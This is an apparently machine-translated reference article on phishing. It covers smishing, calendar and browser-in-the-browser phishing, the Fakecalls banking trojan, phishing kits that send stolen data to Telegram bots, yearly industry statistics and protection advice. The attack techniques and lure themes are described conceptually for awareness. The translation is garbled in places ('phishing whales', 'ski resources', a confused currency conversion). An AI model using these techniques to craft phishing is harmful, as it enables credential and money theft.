Phishing Phishing
A type of Internet fraud whose purpose is to gain access to sensitive user data (logins and passwords). The user thinks that he is moving to the declared site, but in fact he is redirected to the front site. As a rule, customers of banks and payment systems become victims of phishers.
Hackers used emails to carry out this kind of attack, but thanks to the widespread spread of social networks and smartphones with Internet access, the types of phishing attacks began to multiply.
These emails contain a link that supposedly leads the user to the site of a company with a high level of confidentiality, although, in fact, such a site is just a simulation of the original site without any confidentiality.
Thus, a self-confident user who does not have reliable anti-virus protection can become a victim of an attack designed to steal personal data.
Phishing is one of the varieties of social engineering based on users' ignorance of the fundamentals of network security: in particular, many do not know the simple fact: services do not send letters asking for their credentials, password, etc.
To protect against phishing, manufacturers of major Internet browsers have agreed to use the same ways to inform users that they have opened a suspicious site that may belong to fraudsters. New versions of browsers already have such a possibility, which is accordingly called "antifishing."
Phishing Schemes
What feelings do fisher play on
Most cybercriminals rely not only on technology, but also on human carelessness and trustworthiness. Back in 2011, a Cisco report listed seven human weaknesses exploited by criminals who use psychological methods to influence people through email, social networks, and telephone communications. We are talking about:
- sexuality,
- greed,
- vanity,
- excessive trustworthiness,
- laziness,
- compassion and
- haste in decisions made.
What a phishing email looks like:
Senders
- Executive authorities;
- Large telecommunications operators;
- Web-based forums;
- Credit and financial institutions;
- Partner Organizations;
- Customer organizations.
Contents
- Demand from executive authorities;
- Distribution of changes in regulations;
- Collection/repayment of debt/fine, payment of services;
- Search for documents to check.
At the beginning of 2017, experts drew attention to a new phishing campaign directed against Gmail users. The letters contain such well-veiled malicious links that even advanced users often do not notice the trick and enter their credentials on the phishing counterpart Gmail. As soon as the victim is compromised, the attackers immediately intercept access over her account and attack all contacts of the victim.
Malicious emails coming from compromised users allegedly contain a PDF document that can be previewed directly from the web mail interface. However, clicking on such an "attachment," which is actually a simple image built into the letter, the user initiates forwarding to the phishing page[1]
The phishing URL begins with "data: text/html, https ://accounts/google.com," which may mislead the user by making him believe that he is still on the real Google website. In fact, to open a phishing page in a new tab, a special script is used, and the page has nothing to do with Google.
Compromising Email
Main article: E-mail fraud (business email compromise, SOUND, invoice fraud)
Compromise of corporate e-mail (English business email compromise or invoice fraud) is a fraud in which the offender portrays himself as a seller or business partner and convinces the representative of the company to transfer a large amount to an offshore account as "payment" for services that he never provided.
Calendar phishing
At the beginning of 2019, Kaspersky Lab experts recorded a wave of phishing attacks on users of the Google Calendar service. Throughout May, cybercriminals repeatedly sent fraudulent messages to victims, forging them for automatic notifications on the calendar on a smartphone. This new way of conducting phishing attacks potentially gives attackers more opportunities, since theoretically it can mislead even experienced users who are well aware of the threat of spam and phishing in email or instant messengers.
Messages sent by attackers operate the function of automatically adding an invitation to the calendar and notifying you of this event. Many users have this feature enabled by default. If the victim opens a pop-up window on a smartphone, which looks very similar to a notification of the application from, Google then he will most likely see a link to a phishing site, which allegedly carries out a simple survey for a fee. To receive a cash prize, as it turns out later, the user needs to pay a small fee - and for this you need to specify the bank card data and some personal information, in particular the name, phone number and address. Of course, all this goes directly to the attackers.
"This" calendar phishing "is a very efficient scheme. Many users are already accustomed to spam messages in mail and instant messengers and often simply ignore and delete them. Everything is not so obvious in the calendar - because this application is created to organize information, and not to transmit it. So the probability that a fraudulent message in the calendar will be opened may be slightly higher, "said Maria Vergelis, senior spam analyst at Kaspersky Lab. - So far, all samples of such phishing notifications discovered by us contain extremely strange offers, and this is immediately visible to any user. But each simple scheme becomes more complex and thoughtful over time. However, there is good news in this whole story: in order not to become a victim of such fraud, you do not need any special precautions and tricks - the automatic notification function can be easily turned off in the calendar settings. " |
"Google's terms of service and product policies prohibit the distribution of malicious content, and we work hard to prevent and prevent abuse. The fight against spam is an endless battle, and although we have made great progress, sometimes spam takes place. We remain deeply committed to protecting all our users from spam: we scan content in photos for spam and give users the opportunity to report spam in the calendar, Google Forms, on Google Disk, in Google Photo and in Hangouts. In addition, we offer users protection by warning them about known malicious URLs using Google Chrome secure browsing filters, "the Google press service said. |
Smishing (SMiShing)
For several years, hackers used a technique known as phishing. With its help, they sent emails to victims allegedly from a bank, as a result of which they fraudulently tried to obtain registration data for access to a bank account. Since people have become more aware and have become more aware of phishing letters, resulting in fewer phishing victims, hackers have changed their tactics and focused their attention on our phones.
Smishing is conceptually very similar: instead of sending emails, hackers began to send text SMS messages to their victims. Each of these messages is designed to deceive people in order to obtain extremely important personal information from them, for example, a PIN code for accessing their online bank. Some smashing messages will direct their victims to a false website or ask to download the necessary application, which is actually infected with malware.
How to Recognize a Smishing Message
Almost every smishing message has one common feature: a sense of urgency. You will be told that your bank account has been hacked and you must urgently connect to it using the attached link. Or, as part of a routine security audit, your bank account has been blocked, so you need to confirm your password to restore access. You may even be asked to download a special application to improve the security of your account, and the sooner the better.
In fact, no bank sends urgent SMS messages: most of them use e-mail and regular letters to transmit important information. If you received a text message from your bank, it will not contain a link: at the very first opportunity you will simply be redirected to the page of the bank's website with the form for authorization or with the contact details of the bank's customer service.
Similarly, your bank will never send you a link to the site to download the new app. They can send you to the official App Store or Google Play, but most of them will send a pop-up notification through their official application, and not through text SMS.
If you have any (even the slightest) doubts about the text message you received, it is better to delete it. If the question is really very urgent, your bank will contact you again. You can also call them and get confirmation whether there is actually a problem with[2].
Phishing protection measures
Tips for Private Users
Checking the source of each e-mail you receive and going to your bank's website is not a link from the letter, but by typing an address in the address bar of your browser - these are two main precautions that you can take to avoid getting caught "on the fishing rod" of cyber criminals.
1. Learn to identify suspicious phishing emails
There are several features that identify the attack via email[3]:
- They duplicate the image of a famous company.
- They copy the name of the company or full name of the real employee of the company.
- They contain sites that are visually similar to the sites of real companies.
- They offer gifts or scare the loss of an existing account.
2. Check the source of information
Your bank will never ask you to send your passwords or personal information by email. Never answer such questions, and if you have a little doubt, it is better to call your bank for clarification.
3. Never go to your bank's website by clicking on the links in the letters
Do not click on the links in the letter, as as a result of this you may find yourself on the front website.
It is better to manually type the site address in the address bar of your browser or use the previously configured bookmark in Favorites if you want to go faster.
4. Increase your PC's security
It is important not to lose sense of common sense and to have reason, as well as to protect your computer using an antivirus that can block this type of attack.
In addition, you should always install the latest updates to your operating system and web browsers.
5. Enter your critical data only on secure websites
To find out if this website is "secure," check the address string in your browser: the site address must begin with "https ://," and a closed lock icon should appear next to it.
6. Check your accounts periodically
It will never prevent you from periodically checking your bank accounts to avoid missing any suspicious activity in your online transactions.
7. Phishing applies not only to online banks
Most phishing attacks are directed against banks, but they can use other popular websites to steal personal data: eBay, Facebook, PayPal and others.
8. Phishing knows all languages
Phishing knows no boundaries, and can nail you in any language. In general, they are poorly written or translated, and therefore this can serve as another indicator that something is wrong.
For example, if you have never been to the Spanish website of your bank, why should the information for you now be in this language?
9. If there are at least the slightest doubts, do not risk
The best way to prevent phishing is not to respond to any email or news that asks you to provide sensitive data.
Delete these messages and call your bank to clarify your doubts.
10. Periodically read information about the development of malware
If you want to be aware of the latest malicious attacks, recommendations or tips to avoid any dangers on the Internet, you can read specialized blogs about cyber security on Facebook, VK, Twitter, etc.
Recommendations for organizations
In order not to become a victim of phishing, it is recommended that users always verify the authenticity of the website on which they intend to enter financial information, and check whether the connection is protected by the secure https protocol. In addition, you should not follow suspicious links and fulfill all the requirements set out in emails on behalf of the bank, if they cause even the smallest proportion of doubt - in this case, it is better to contact the financial institution directly. And, of course, it is necessary to use a protective solution that includes proactive phishing recognition and blocking functions.
What must be done to avoid danger:
- Regularly update your antivirus and browser.
- Hover over the link to see where it leads.
- Check your email for misspelled words, incorrect URLs, poor graphics, and unknown senders.
- Instead of clicking on the link in the letter, you should visit the website of the company that sent the letter to verify the reliability of the information.
What you can't do:
- Do not click on links in letters received from unknown or suspicious sources.
- Don't send a suspicious email to friends or family.
- Don't upload content that your browser or antivirus thinks is suspicious.
- Do not leave personal information on the site.
Training of company personnel
The project on increase process forming [4]
- Responsible, Timeline, Project Budget
- Training Program
- Material Development/Finished System Selection
We conduct training:
- Basic program for new employees
- Periodic mailings by topic
- One-off newsletters with important information about current threats
We check:
- Knowledge Assessment
- Testing in "combat" conditions "
Awareness Systems Market
Imitation of the action of an attacker: phishing mailings for educational purposes
Threats associated with the use of social engineering will not go anywhere in the near future (but most likely will only grow)
- Such attacks are universal for penetration into any systems, easily replicated
- One " caught" is enough to compromise the entire network
- Do not rely solely on hardware
You can reduce risks by training employees and effectively testing their knowledge
- We supplement organizational measures with "combat exercises"
- Testing by conducting phishing newsletters can be supplemented by a simulation of other actions of intruders: telephone fraud, penetration tests
What is important is not what tools we use, but a well-organized training and testing process
- All of these solutions are just case studies
- If there are no processes, then there will be nothing to automate.
Phishing in Russia
Main article: Phishing in Russia
2022
Online banking malware intercepts support calls
Researchers in the field cyber security from the company "" Kaspersky Lab talked bank trojan about a name called Fakecalls. In addition to ordinary espionage functions, he has an interesting ability - to "talk" with the victim, imitating communication with an employee. bank This became known on April 12, 2022.
Fakecalls simulates mobile applications of well-known Korean banks, including KB (Kookmin Bank) and KakaoBank. In addition to the usual logos, the creators of the trojan display on the Fakecalls screen the numbers of the support service of the respective banks. Phone numbers seem real (one of the numbers can be found on the home page of the official website KakaoBank).
During installation, the trojan requests a number of permissions, including access to contacts, microphone and camera, geolocation, call processing, etc.
Unlike other banking trojans, Fakecall can simulate phone conversations with support. If the victim calls the bank hotline, the trojan quietly breaks the connection and opens his fake call screen instead of the usual call application. While the user does not suspect anything, the attackers take the situation into their own hands.
The only thing a Trojan can give out is a fake ringing screen. Fakecalls has only one interface language - Korean. This means that if another language of the system is selected on the phone, then the victim is likely to feel wrong.
After intercepting the call, two scenarios are possible. In the first, Fakecalls connects the victim directly with cybercriminals, since the application has permission to make outgoing calls. In the second case, the trojan plays a pre-recorded sound that simulates a standard bank greeting. The attackers recorded several phrases in Korean, usually spoken by voicemail or call center employees. Fraudsters under the guise of a bank employee may try to lure payment data or other confidential information from the victim.
In addition to outgoing calls, Fakecalls can also spoof incoming calls. When attackers want to contact the victim, the Trojan displays its screen on top of the system. As a result, the user does not see the real number used by the attackers, but the one that shows the malware, for example, the phone number of the bank support service.[5]
Browser-in-browser phishing attack
Among the attackers phishing browser , a browser-in-the-browser (BitB) attack is gaining popularity, which creates a completely fake browser window, including trust icons. This became known from the Company "" Informzaschita on April 07, 2022. This concept was previously used hacker by groupings to steal to data log in. Researchers in the field information security are concerned that attack browser-in-the-browser will be actively applied in the field. advertizing With the BitB technique, the browser window is simulated in order to fake a legitimate domain, which allows for plausible phishing attacks. This method uses third-party features of single sign-on technology (SSO), which are built into services such as Google SignIn (the same system works with Facebook, Apple, or Microsoft). On the screen, it will look like something like the "Sign in with Microsoft" button, and then a pop-up window will appear asking for information to access your account or profile.
Typically, the phishing window includes a closed lock icon and a resource URL (fake), which is clear of the security of the authentication process. But if the browser is correctly configured security policies and all anti-virus patches are updated, then it will be difficult for an attacker to insert an illegitimate page, explained by experts on the analysis of the security of "Informzaschita."
|
At the same time, hackers often use methods such as clickjacking or fixing the user interface, which changes the appearance of browsers and web pages in order to circumvent protection. Thanks to the clickjacking attack, you can, for example, insert a transparent element over the button of the web page so that the user's action is intercepted by an attacker. BitB extends this technique by creating a completely fake browser window. The user thinks that he sees the real window, while in fact it is forged inside the page and seeks to seize other people's credentials. A mixture of HTML and CSS code is used to simulate the browser window. The browser-in-browser attack is effective for phishing campaigns. Users still need to visit the malicious site so that a pop-up window appears, but after that they are most likely to put their credentials in the form, because everything will look plausible.
The concept of BitB can be actively used by those who distribute viral advertising, according to Infomprotection. Malicious code can get through such ads in iframe, but since iframe is not protected, it can be embedded on the parent page in the form of a fake window in the browser. Development companies try to track malicious codes. At the same time, IB experts believe that the BitB attack is unlikely to deceive other software.
Phishing tool that allows browser-in-browser attacks to steal logins and passwords
On March 23, 2022, it became known that an expert on safety the nickname mr.dox published on the GitHub code of a phishing tool that allows you to create fake windows. browser Chrome Its purpose is to intercept the details of access to online resources.
As reported, when logging in to many sites, instead of directly registering for them, you can pledge using accounts on social networks or Google, Microsoft, Apple and even Steam. This option, for example, is offered by Dropbox.
When an attack occurs, a window pops up with a form of entering details. It may display a URL, but it cannot be changed. This string is used to authenticate the login form.
Hackers repeatedly tried to use fake login windows (Single Sign-On) - using HTML, CSS, JavaScript - however, as a rule, these windows looked like a fake, capable of deceiving only the most inexperienced users.
However, the attack, called "Browser-in-browser," allows you to display registration windows that are indistinguishable from the real ones. It will be enough for hackers (or pentesters) to edit only the URL and the window name (title field) in the compiled mr.dox templates and create an iframe that will display this window.
The HTML code for the login form can be embedded directly into the template, however, as stated by mr.dox, you will need to correctly arrange the corresponding field using CSS and HTML. This, however, is unlikely to greatly complicate the task.
Information security expert Kuba Gretzky, creator of another Evilginx phishing set, was convinced of the compatibility of his development with what he did mr.dox; in combination, these two phishing sets can be used to intercept two-factor authorization keys.
It will be extremely difficult to defend against such an attack. The developer himself indicates that she is focused on pentesters, but it is obvious that in the near future she is already involved in real attacks. The only precaution will be to know about the possibility of such attacks and check three times where the user enters his access details. It is worth noting, however, that the technique will not work when using software for autofill passwords, including those built into the browser: it will immediately determine that the window is fake. says Anastasia Melnikova, director of information security at SEQ |
The technique of such attacks is not new in itself, claims mr.dox. According to him, it was already used with varying success by the creators of fake sites for gamers to steal access details. And recently: these attacks are dated 2020[6].
2021
Top 10 "phishing" topics
On January 11, 2022, Positive Technologies shared the top 10 "phishing" topics of 2021.
According to the company, the share of attacks on individuals using social engineering methods in the third quarter of 2021 year increased to 83% compared to 67% in the same quarter of 2020. Although most attack vectors remain relevant from year to year, attackers constantly improve methods of deceiving victims and successfully adapt to the conditions of the pandemic. They are increasingly exploiting in their attacks the increased requests of citizens for vaccination, delivery services, online dating, subscription services and even compensation for victims of fraud.
According to Positive Technologies, the top 10 topics of phishing attacks of 2021 cover the following areas:
- Continuation of the COVID-19 pandemic
- The main topic in this area in 2021 was vaccination: fraudsters offered to buy fake QR codes and certificates, and also conducted fake surveys about vaccination of employees to collect data.
- Corporate Mailings
- The analysis showed that phishing mailing scenarios on wage changes, social package updates and banking costs are particularly successful.
- Premieres of TV shows and films
- During high-profile premieres, fraudsters are more successful in stealing account and credit card data using fake sites that mimic popular streaming services.
- Sporting events
- In 2021, attackers used the themes of the Tokyo Olympics, the European Football Championship and have already begun to exploit the theme of the 2022 World Cup.
- Clients banks Under Sight
- Under the guise of well-known brands, attackers lure users by promising bonuses, preferential loans or compensation to victims of fraud, as well as reporting "problems" with a mobile bank.
- Postal Services
- Fraudsters steal money and data, offering customers of such services to "pay" delivery, duty or simply "check" the status of their package.
- Vacations and travel
- Phishing letters and sites offer to book places to relax and tickets, luring people with lucrative promotions and discounts.
- Dangerous acquaintances
- Attackers cynically exploit people's craving for communication during a massive transition to a remote location and steal victims by assigning fake dates to them.
- Subscriptions to services
- Scammers are popular subscription services, sending letters to victims on the subject of issuing or renewing subscriptions to various platforms.
- Investments in cryptocurrency, oil and gas
- Against the backdrop of the growing popularity of investment among individuals, cybercriminals create fake sites that mimic the resources of well-known companies, and even entire fake investment platforms.
In 2022, we again expect to see a large number of phishing attacks united by the theme of significant events, including mass mailings on the theme of the World Cup or the Winter Olympic Games, "said Ekaterina Kilyusheva, head of the research group of the information security analytics department of Positive Technologies. - There is also a high probability of attacks on users in connection with the release of new films and TV shows. In 2022, for example, it is planned to launch a series based on the works of J. R. R. Tolkien. And in connection with the release of the prototype digital ruble, attackers can create fake sites, offering to buy digital currency. We can expect the development of fraudulent schemes using social engineering in the field of investment. Here the victims will be private investors, to whom fraudsters will persistently offer their services under the guise of investors, authors of training courses and fake investment platforms. |
Positive Technologies analysts also predict the further development and distribution of the Phishing-as-a-Service model. This model is based on the cooperation of attackers, the purchase and sale of ready-made solutions, such as fraudulent sites or malicious scripts.
To prevent serious consequences of phishing, experts recommend: always check the sender's address, do not follow suspicious links, do not enter accounts and payments, data not being convinced of the legitimacy of the resource. Book hotels and tickets, as well as subscriptions to services, should be made only on verified resources. To avoid infection with malicious, ON you need to check all received. In an files enterprise environment, sandboxes are recommended.
Due to fake draws, users lose $80 million per month
Every month, users around the world lose about $80 million due to fraudulent surveys and draws. Such data in December 2021 were led by Group-IB, a company specializing in information security.
Scammers use the names of 120 popular brands to entice potential victims. People are offered as a gift, MacBook Sony Playstation 5, iPad Pro and flagship models and. smartphones Apple Samsung
Most often, residents of Europe become victims of fraudsters - 36.2%, and targeted fraud is most common in India - 42.2% of cases of such fraud are registered in this country.
Most often, targeted fraud is found in the areas of telecommunications (56%), e-commerce (22.9%) and retail (11.9%), reports. RBC
According to Group-IB, if earlier fraudsters preferred to massively send spam and SMS messages to users, as well as write in instant messengers and by e-mail, now the approach is personalized. Thus, a unique targeted link is generated for a potential victim, which includes data on the country where the user lives, as well as on the time zone, language, IP address, browser type and other aspects.
To support phishing links, special domain networks are created, in the largest of which 232 domains. This allows you to quickly transfer traffic when blocking one of them and ensure a daily attendance of fake polling of 5 thousand users per day. Phishing of this type is a big threat to brands, says Andrei Busargin, Group-IB deputy director for Digital Risk Protection.
If once a user lost money due to a "brand," then he is unlikely to return to it. There are also many unpredictable risks, for example, accounts are massively stolen on the site, and then money is washed through these accounts. If it comes to the proceedings, the company can get a strong blow to its reputation along with a fine from the regulatory authorities, "he said.[7]" |
Tens of thousands of Iranians faced massive phishing attacks
On December 3, 2021, the Check Point Research (CPR) team from Check Point Software Technologies Ltd., a provider of field solutions cyber security around the world, recorded large-scale malicious campaigns with mailing: phishing SMS attacks aimed at tens of thousands of devices of citizens. Iran Messages allegedly sent by state Iranian services encourage victims to upload harmful applications for Android those who steal accounts, personal data credit cards SMS messages and codes. two-factor authentication Attackers can also withdraw money from the victim cards and turn infected devices into bots, using them to spread malicious to other ON devices. The Check Point Research team believes that the main motivation of intruders is. financial
According to CPR (Check Point Research), attackers infected tens of thousands of Android devices, which led to the theft of billions of Iranian riyals (1000 riyals are approximately 1.76 rubles).
Attackers use Telegram channels to distribute malicious tools, which cost only $50 (about 3,700 rubles).
According to a CPR (Check Point Research) study, data stolen from victims' devices were not protected, so they were freely available online.
Attackers use compromised devices as bots to send similar phishing SMS messages to other potential victims. To promote and sell their tools, cybercriminals use several Telegram channels. For 50-150 US dollars (approximately 3,700-11,100 rubles), fraudsters provide a complete "Android Campaign Kit," which contains a malicious application and a basic infrastructure with a control panel that can be easily managed through a Telegram bot without any specialized skills.
The CPR (Check Point Research) investigation comes at the height of major cyber attacks targeting Iranian residents, including attacks on railways, gas stations and more.
According to CPR estimates, attackers compromised tens of thousands of Android devices and installed malware on them. As a result, they were able to steal billions of Iranian riyals. It is estimated that each victim lost between $1,000 and $2,000 (between $74,600 and $148,000). In addition, the CPR investigation showed that the data stolen from the victims' devices were not protected, so they were in the public domain on the network.
Figure 1. Infection chain
Cyber attacks significantly affect the daily life of Iranians. At first it was railways: we tracked that they were organized by the Indra cyber group. Then there were cyber attacks on gas station systems and airlines. Now we are seeing another attack that shows how cybercrime can lead to chaos. We do not see a direct connection between the latest cyber attacks and other aforementioned ones, but our studies show that even the simplest, not large-scale cyber attacks cause serious damage to the population of Iran, "said Alexandra Hoffmann, head of the threat analysis group of Check Point Software. - We believe that these recent cyber attacks are financially motivated - and that the people involved in these attacks are themselves from Iran. |
The speed and spread of these cyber attacks is unrelenting. This campaign was aimed at a huge number of people. Cybercriminals were able to cause serious damage to their victims, even though the quality and technical simplicity of the tools were poor. There are several reasons for their success. Firstly, well-chosen methods of social engineering, imitating official messages from public services: people wanted to study the details by clicking on the link from the message. Secondly, technical techniques when each infected device sends additional phishing SMS messages - the attacks were able to spread very quickly to a large number of potential victims. It was these campaigns that were used in Iran, but in general they can be used in any other part of the world. I believe it is important to raise awareness of the schemes used by attackers. |
Six out of ten users are caught phishing
On October 13, 2021, the international developer of antivirus solutions ESET shared the results of a user test for the ability to distinguish a phishing message from a regular letter. The experiment involved 4,292 people in different age groups. Each user was sent four letters to email - malicious and safe. As a result, 60% of participants could not correctly identify fraudulent letters.
The test showed that young users were much more likely to distinguish real messages from fake ones: 47% in the age group from 18 to 24 years old understood which letter should not be opened. In the age group from 25 to 44 years old, the indicators are similar - 45%. Users from 45 to 64 years old were mistaken more often and were able to identify a fake in 36% of cases. In a group over 65 years old, only 28% of the participants revealed the plan of fraudsters.
Phishing has existed for a very long time, but attackers do not stop improving their skills in forging letters from well-known brands and official government agencies. According to ESET analysts, phishing campaign tactics are aimed at home office employees. The structure of consumption at remote work has changed, and this created the conditions for a more successful application of phishing, "commented Tony Anscombe, ESET chief security specialist. |
According to the ESET threat telemetry, the leaders in the daily blocking of phishing sites in the world are Russia, Japan, Peru, Poland and France. At the same time, sources of malicious mailings are most often detected in North America and Western Europe.
Ukrainian police neutralized one of the world's largest phishing services
Employees of the Office of the Prosecutor General, together with employees of the Department of Cyber Police of the National Police of Ukraine and the Main Investigative Directorate of the National Police, as well as law enforcement agencies of the USA and Australia, conducted a special operation, according to the results of which[8] was neutralized[9] The activity of one of the world's largest phishing services to carry out attacks on financial institutions of different countries[10].
According to the investigation, a hacker from the Ternopil region developed a phishing package and a special administrative panel for him, which were aimed at the web resources of banks and their customers. The administrative panel allowed you to control the accounts of users who registered with compromised resources and entered their payment data. To demonstrate the functionality and sell his developments, the attacker created his own online store in the darknet.
As a result of phishing attacks, financial institutions in Australia, Spain, the USA, Italy, Chile, the Netherlands, Mexico, France, Switzerland, Germany and the UK suffered. According to preliminary data, losses reach tens of millions of dollars. For example, more than 50% of all phishing attacks in 2019 in Australia were carried out precisely thanks to the development of a Ternopil hacker.
During the search, law enforcement officers seized computer equipment, mobile phones and hard drives. During the inspection of the seized computer equipment, more than 200 active buyers of malware were installed. According to preliminary data, the hacker not only sold his products to customers around the world, but also provided technical support for phishing attacks. Now the issue of reporting to the defendant about suspicion is being decided.
2020
Cybercriminals use Telegram bots and Google forms to automate phishing
On April 7, 2021, it became known that an Group-IB international company specializing in prevention cyber attacks discovered that data users stolen as a result of phishing attacks are increasingly unloaded not only with the help of, but also e-mail such legitimate services as Google forms and. messenger Telegram Alternative methods of delivering stolen data using phishing allow attackers to ensure their safety and speed of use. Telegram-boats are also used cybercriminals in ready-made platforms for phishing automation available in: they Darknet implement an administrative part based on bots, with the help of which the entire process is controlled phishing attack and the stolen money is recorded. Such platforms are distributed according to the cybercrime-as-a-service format, due to which the number of attacking groups and the scale of the criminal business are growing.
As explained, the CERT-GIB team (Group-IB Information Security Incident Monitoring and Response Center) analyzed the tools for creating phishing pages, the so-called phishing whales, and found out that in 2020 with their help phishing sites were most often created for various online services (online shopping, online cinemas, etc.), financial organizations, as well as e-mail. In total, Group-IB discovered phishing whales aimed at more than 260 unique brands in Russia and abroad.
A phishing kit is a set of ready-made tools for creating and launching phishing web pages forged for a particular company's website or several at once. As a rule, phishing whales are sold in the darknet, in specialized forums. With them, criminals who do not have deep programming skills can deploy infrastructure for large-scale phishing attacks and quickly resume its work if blocked. Phishing whales are interesting to cybersecurity researchers primarily because analyzing one such "set" allows you to understand the mechanism for implementing a phishing attack and establish where stolen data is sent . In addition, research on phishing whales often helps to detect digital traces leading to developers of such a "product."
As in 2019, the main target of phishers was online services (30.7%): by stealing the credentials of user accounts, attackers gained access to the data of linked bank cards. The attractiveness of postal services for attacks in 2020 decreased, and the share of phishing whales aimed at them decreased to 22.8%. The three are closed by financial institutions, which account for slightly more than 20%. In 2020, the most commonly used brands in phishing sets were Microsoft, PayPal, Google and Yahoo.
The attacker does not immediately receive the data that the user enters on the phishing site: first they are written to a local file, after which the main task is to retrieve the stolen one. Most often, mail addresses registered on free e-mail services are used to forward such data. They make up 66% of the total number of addresses found in phishing sets. The most common accounts are on Gmail and Yandex.
mostAlternative ways of obtaining data stolen by attackers can be divided into local ones, when they are written to a file located on the phishing resource itself, and remote ones - when they are sent to a third-party server. To transfer stolen data, attackers actively use legitimate services. So, in 2020, widespread use began in phishing sets of Google forms, as well as uploading stolen data to specially created private Telegram bots. In total, alternative methods still account for about 6%, but most likely their share will grow, and Telegram will account for the main increase due to the simplicity of the implementation of the scheme and the anonymity of the messenger.
The functionality of phishing whales is not limited to creating pages for stealing user data: some of them can upload malicious files to the victim's device. Sometimes sellers of phishing kits deceive their own customers by trying to earn money on them twice. In addition to selling the malicious tool they created, they may also be interested in the data stolen using it. Using a special script built into the body of a fish whale, they direct the flow of stolen user data to themselves or gain hidden access to their buyer's hosting.
Phishing whales changed the rules of the game in this segment of the fight against cybercrime: previously, attackers stopped their campaigns after blocking fraudulent resources and quickly switched to other brands, in April 2021 they automate the attack, bringing phishing pages to replace blocked ones. Automation of such attacks, in turn, leads to the spread of more complex social engineering, which begins to be used in large-scale attacks, and not in point ones, as it was before. This allows representatives of one of the most ancient cybercrime professions to stay afloat. headed by Yaroslav Kargalev, Deputy Head of CERT-GIB |
It is not enough to fight against "advanced" phishing schemes using classical monitoring and blocking, it is necessary to identify all elements of the attacking infrastructure, blocking not individual phishing pages, but the entire network of fraudulent resources.
Kaspersky Lab: 86 thousand ski resources found in the world
Kaspersky Lab on December 3, 2020 presented rerultats for analyzing the most common telephone and online fraud schemes in 2020.
According to Kaspersky Lab, in 2020, the volume of telephone fraud and scam was actively growing. From January to November, the company discovered almost 86 thousand ski resources in the world, of which 62.5 thousand were blocked in the second half of the year. This phenomenon is especially common in the Russian-speaking segment of the Internet. Among the most popular schemes among benches in 2020 can be distinguished:
- reports on various social benefits, including those related to coronavirus infection (about 15.6 thousand such resources were found);
- offers related to bulletin boards, delivery services or food ordering (found 8.6 thousand such sites);
- surveys on behalf of allegedly large companies and brands (6.5 thousand resources were recorded).
The mechanics of such online fraud almost always remain the same: under the pretext of a discount, a favorable promotion or other monetary reward, attackers lure the user to a fake page. Usually the promised amount is several tens or hundreds of thousands of rubles. The size of fake payments is not overstated so that the proposal seems realistic. When a person passes all stages of a survey or questionnaire, he is asked to transfer the "fixing payment" (about 300 rubles). As a result, he does not receive any money, and the "commission" goes to the attackers.
It is worth noting that in general, the number of attempts to switch users to ski pages in 2020 exceeded 44 million.
If we present the amount of potential damage from the scam in 2020 in rubles, then it could exceed 13 billion. So many attackers could get if each attempt blocked by our products to switch a user to such a resource still entailed the deception of at least one person, "notes Konstantin Ignatiev, an expert on content analysis at Kaspersky Lab. - We encourage users to be attentive and skeptical of extremely generous offers on the network. Attackers use methods of simple but effective social engineering and play on the desire to earn easy money - as a result, unfortunately, people themselves give them their funds, and sometimes personal or payment data. |
Attackers actively tried to make money on users using phone calls. According to Kaspersky Who Calls statistics Russia , in 2020, among all those entering from unknown numbers, the share spam was 63%, and the share of calls suspected of fraud was 5.9%. At the same time, attackers actively used the technology of replacing the number. Most often, they indicated the phones financial of organizations, government agencies or legal entities.
In 2020, the number of calls from attackers continued to grow. This may be due to the fact that people spend more and more time with the phone at hand and more often pick up the phone. But at the same time, they do not always have the opportunity to make a balanced decision in the conversation. Often, attackers used a current news agenda to arouse the trust of the victim, "said Sergey Golovanov, a leading expert at Kaspersky Lab. |
Check Point: The number of phishing attacks on behalf of delivery services increased by 440%
On December 2, 2020, it became known that the Check Point Research team, the research division of Check Point Software Technologies, reports that in November the number of phishing letters on behalf of delivery services increased by 440% compared to October. The sharpest growth was recorded in Europe, in the second and third places in the number of phishing campaigns were North America and the Asia-Pacific region. Most often (in 56% of cases) fraudsters sent letters on behalf of DHL. In second place is Amazon (37%), in third - FedEx (7%).
In Europe in November, the number of phishing letters increased by 401% compared to October. 77% of them disguised themselves as various notifications from Amazon. In the United States, fraudsters sent 427% more phishing messages than in October, and 65% of them were on behalf of Amazon. And in the Asia-Pacific region, the number of phishing attacks on behalf of delivery services increased by 185%, with almost 65% of letters using the DHL brand.
Back in early November, the US Centers for Disease Control and Prevention warned of the dangers of visiting shopping centers during the holidays and recommended shopping online. Online shopping volumes in the country continue to break all records. In the first 10 days of November, in the season of preparation for the holidays, Americans spent $21.7 billion on online purchases - 21% more than in 2019. According to the publication DC360, over the holiday weekend in honor of Thanksgiving in 2020, buyers will spend $38 billion, which is almost twice as much as in the same period of 2019.
However, not only stores prepared for the online shopping boom - the attackers also mobilized forces to earn money on the festive excitement. Now, in addition to fake discount offers and links to store sites, they have become more likely to send phishing letters on behalf of delivery services.
Check Point Research researchers warn that a carefully thought-out scheme uses the entire online shopping system: from discount offers, for example, on Black Friday and Cyber Monday, to the process of delivering orders. Its main goal is to deceive people to disclose the data of accounts and bank cards in order to later use them to steal money. Unlike regular phishing letters, with the help of which fraudsters try to get personal data, information to enter the personal account of an online bank or card data, letters on behalf of delivery services contain various fake messages about problems or offers to track the package.
To resolve the problem or to use the service, you must provide personal or credit card information. Fraudsters did not accidentally start sending such letters in November, since this month many buyers of online stores are waiting for their purchases and more often pay attention to messages from delivery services. In addition, many users are already aware of old methods of fraud during the sale period, and traditional "profitable offers" have ceased to generate income for criminals.
To protect yourself during online shopping, it is important to follow several simple rules. For example, for different sites, use unique non-repetitive logins and passwords, access the site not by a link from a letter that may turn out to be phishing, but open it through a search engine, "recommends Vasily Diaghilev, head of Check Point Software Technologies in Russia and the CIS. - Special attention should be paid to language and errors in letters and domain names: for example, attackers can use the.co extension instead of.com or allow typos in the letter itself. |
The statistics and data used in this report were detected by Check Point threat prevention technologies and stored and analyzed in the ThreatCloud. ThreatCloud provides real-time threat information from hundreds of millions of sensors worldwide through networks, endpoints, and mobile devices. Intelligence is equipped with AI-based engines and exclusive research data from Check Point Research, the research division of CheckPoint.
Group-IB helped Interpol identify phishing criminals from Nigeria
On November 25, 2020, Group-IB, an international company specializing in the prevention of cyber attacks, took part in Interpol's Falcon operation to curb the activities of cybercriminals from Nigeria. More details here.
Group-IB: The number of identified and blocked phishing resources increased by 118%
Group-IB, an international company specializing in the prevention of cyber attacks, investigated key changes that have occurred in the field of cybercrime in the world and on November 25, 2020 shared its forecasts for the development of cyber threats for 2021. More details here.
